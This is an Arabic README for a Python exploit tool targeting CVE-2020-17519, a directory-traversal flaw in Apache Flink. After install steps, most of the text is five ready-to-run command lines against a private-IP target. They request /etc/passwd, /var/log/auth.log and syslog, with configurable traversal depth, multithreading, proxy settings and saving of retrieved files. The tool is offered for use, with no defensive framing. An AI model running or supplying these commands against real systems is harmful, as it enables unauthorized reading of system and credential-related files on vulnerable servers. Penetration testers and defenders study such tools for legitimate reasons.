
أداة استغلال اجتياز الدلائل مبنية على بايثون لثغرة CVE-2020-17519 (Apache Flink) مع دعم تعدد الخيوط، ودعم البروكسي، وعمق قابل للتكوين لاسترجاع ملفات السجلات من الأهداف المعرضة للخطر.
أداة بلغة بايثون تستخدم تقنية اجتياز الدليل لطلب ملفات السجلات من عنوان URL مستهدف. تعرض التقدم في الوقت الفعلي، وتدعم إعداد البروكسي، وتحفظ الاستجابات الصالحة بشكل اختياري.
requests و pwntools (pwn)argparse, os, concurrent.futures, threadinggit clone https://github.com/GazettEl/CVE-2020-17519.git
pip install requests pwntools
يمكن تنفيذ الأداة من سطر الأوامر مع خيارات متنوعة. فيما يلي بعض الأمثلة:
المثال 1: طلب مسار ملف واحد
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-path /var/log/syslog --threads 1 --save
المثال 2: طلب مسارات ملفات متعددة من قائمة
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-list file_paths.txt --threads 4 --proxy none
المثال 3: التشغيل مع تعطيل البروكسي
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 10 --file-path /var/log/auth.log --threads 2 --proxy none
المثال 4: استخدام قائمة ملفات وحفظ الاستجابات الصالحة
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 15 --file-list paths.txt --threads 4 --save
المثال 5: طلب ملف واحد بعمق متزايد
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 20 --file-path /etc/passwd --threads 1
لمزيد من التفاصيل، راجع الكود المصدري والتعليقات المضمّنة.